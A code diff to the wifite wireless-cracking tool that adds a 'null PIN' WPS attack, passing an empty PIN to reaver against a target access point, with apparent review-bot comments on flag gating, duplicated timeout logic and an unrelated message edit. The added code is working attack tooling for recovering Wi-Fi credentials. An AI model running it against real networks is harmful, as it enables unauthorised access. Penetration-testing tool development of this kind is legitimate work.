diff --git a/wifite/attack/all.py b/wifite/attack/all.py index 6db4d3718..cfaea01c3 100755 --- a/wifite/attack/all.py +++ b/wifite/attack/all.py @@ -64,6 +64,10 @@ def attack_single(cls, target, targets_remaining): if Configuration.wps_pixie: attacks.append(AttackWPS(target, pixie_dust=True)) + # Null PIN zero-day attack + if Configuration.wps_pin: + attacks.append(AttackWPS(target, pixie_dust=False, null_pin=True)) + # PIN attack if Configuration.wps_pin: attacks.append(AttackWPS(target, pixie_dust=False)) diff --git a/wifite/attack/wps.py b/wifite/attack/wps.py index ca4169c88..c9f873a3c 100755 --- a/wifite/attack/wps.py +++ b/wifite/attack/wps.py @@ -14,11 +14,12 @@ class AttackWPS(Attack): def can_attack_wps(): return Reaver.exists() or Bully.exists() - def __init__(self, target, pixie_dust=False): + def __init__(self, target, pixie_dust=False, null_pin=False): super(AttackWPS, self).__init__(target) self.success = False self.crack_result = None self.pixie_dust = pixie_dust + self.null_pin = null_pin def run(self): ''' Run all WPS-related attacks ''' @@ -78,7 +79,7 @@ def run_bully(self): def run_reaver(self): - reaver = Reaver(self.target, pixie_dust=self.pixie_dust) + reaver = Reaver(self.target, pixie_dust=self.pixie_dust, null_pin=self.null_pin) reaver.run() self.crack_result = reaver.crack_result self.success = self.crack_result is not None diff --git a/wifite/tools/reaver.py b/wifite/tools/reaver.py index 3ff11a04a..e8b8b8440 100755 --- a/wifite/tools/reaver.py +++ b/wifite/tools/reaver.py @@ -18,10 +18,11 @@ class Reaver(Attack, Dependency): dependency_name = 'reaver' dependency_url = 'https://github.com/t6x/reaver-wps-fork-t6x' - def __init__(self, target, pixie_dust=True): + def __init__(self, target, pixie_dust=True, null_pin=False): super(Reaver, self).__init__(target) self.pixie_dust = pixie_dust + self.null_pin = null_pin self.progress = '0.00%' self.state = 'Initializing' 
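Review bot: The new null-PIN step in `attack_single` is gated on `Configuration.wps_pin`, the same flag as the PIN attack directly below it, so an operator cannot enable one without the other. Every PIN run is now preceded by an extra attempt, which the later reaver.py hunks bound by `Configuration.wps_pixie_timeout`. A dedicated option (name for the maintainers to choose) would keep the scope of an authorised test explicit. The comment `# Null PIN zero-day attack` is also inaccurate, since the step only submits an empty WPS PIN; `# Null (empty) PIN attack` describes it better. attack_single continues outside the hunk.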
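Review bot: `null_pin` is forwarded only in `run_reaver`; `run_bully`, whose body is outside this hunk, is not touched by the commit. `can_attack_wps` accepts either tool, and the selection logic in `run()` is not visible here. If `run()` falls back to Bully, an `AttackWPS(target, pixie_dust=False, null_pin=True)` would presumably run as an ordinary PIN attack and then be repeated by the next entry in the attack list. Consider a guard in `run()` that returns early on `if self.null_pin and not Reaver.exists():`, with a message saying the null-PIN step was skipped.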
@@ -51,6 +52,9 @@ def __init__(self, target, pixie_dust=True): if pixie_dust: self.reaver_cmd.extend(['--pixie-dust', '1']) + if null_pin: + self.reaver_cmd.extend(['-p', '']) + self.reaver_proc = None @staticmethod @@ -117,7 +121,7 @@ def _run(self): # Check if locked if self.locked and not Configuration.wps_ignore_lock: - raise Exception('{O}Access point is {R}Locked{W}') + raise Exception('{O}Because access point is {R}Locked{W}') time.sleep(0.5) @@ -134,7 +138,7 @@ def _run(self): def get_status(self): - if self.pixie_dust: + if self.pixie_dust or self.null_pin: main_status = '' else: # Include percentage @@ -206,6 +210,9 @@ def parse_failure(self, stdout): if self.pixie_dust and self.running_time() > Configuration.wps_pixie_timeout: raise Exception('Timeout after %d seconds' % Configuration.wps_pixie_timeout) + if self.null_pin and self.running_time() > Configuration.wps_pixie_timeout: + raise Exception('Timeout after %d seconds' % Configuration.wps_pixie_timeout) + # WPSFail count self.total_wpsfails = stdout.count('WPS transaction failed') if self.total_wpsfails >= Configuration.wps_fail_threshold: @@ -297,12 +304,16 @@ def pattack(self, message, newline=False): time_left = Configuration.wps_pixie_timeout - self.running_time() time_msg = '{O}%s{W}' % Timer.secs_to_str(time_left) attack_name = 'Pixie-Dust' + elif self.null_pin: + time_left = Configuration.wps_pixie_timeout - self.running_time() + time_msg = '{O}%s{W}' % Timer.secs_to_str(time_left) + attack_name = 'NULL PIN' else: time_left = self.running_time() time_msg = '{C}%s{W}' % Timer.secs_to_str(time_left) attack_name = 'PIN Attack' - if self.total_attempts > 0 and not self.pixie_dust: + if self.total_attempts > 0 and not self.pixie_dust and not self.null_pin: time_msg += ' {D}PINs:{W}{C}%d{W}' % self.total_attempts Color.clear_entire_line()
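Review bot: Nothing stops `pixie_dust` and `null_pin` from both being true, and `Reaver.__init__` still defaults to `pixie_dust=True`, so `Reaver(target, null_pin=True)` builds a command carrying both `--pixie-dust 1` and `-p ''`. The later `get_status`, `parse_failure` and `pattack` hunks test `self.pixie_dust` first, so such an instance would be reported as Pixie-Dust. The caller in wps.py passes both flags explicitly, but a guard here is cheap: `if pixie_dust and null_pin: raise ValueError('pixie_dust and null_pin are mutually exclusive')`. None of the visible hunks checks whether the installed reaver accepts an empty `-p` value, so a comment naming the minimum supported version would help.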
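Review bot: The change to `'{O}Because access point is {R}Locked{W}'` in `_run` is unrelated to the null-PIN feature. It also turns the exception text into a sentence fragment that only reads correctly if the handler prepends its own wording. That handler is outside the hunk, so if any caller logs or compares the bare message, the old `'{O}Access point is {R}Locked{W}'` is the safer wording. Otherwise this edit belongs in its own commit.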
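Review bot: The added timeout check in `parse_failure` is a copy of the pixie-dust check directly above it and reuses `Configuration.wps_pixie_timeout` for a different attack. The same duplication appears in the `pattack` hunk at -297, where the `elif self.null_pin:` branch repeats the `time_left`/`time_msg` lines. The two conditions can be merged as `if (self.pixie_dust or self.null_pin) and self.running_time() > Configuration.wps_pixie_timeout:`. If the pixie timeout is meant to cover both modes, the option's help text (not visible here) should say so. parse_failure's body continues outside the hunk.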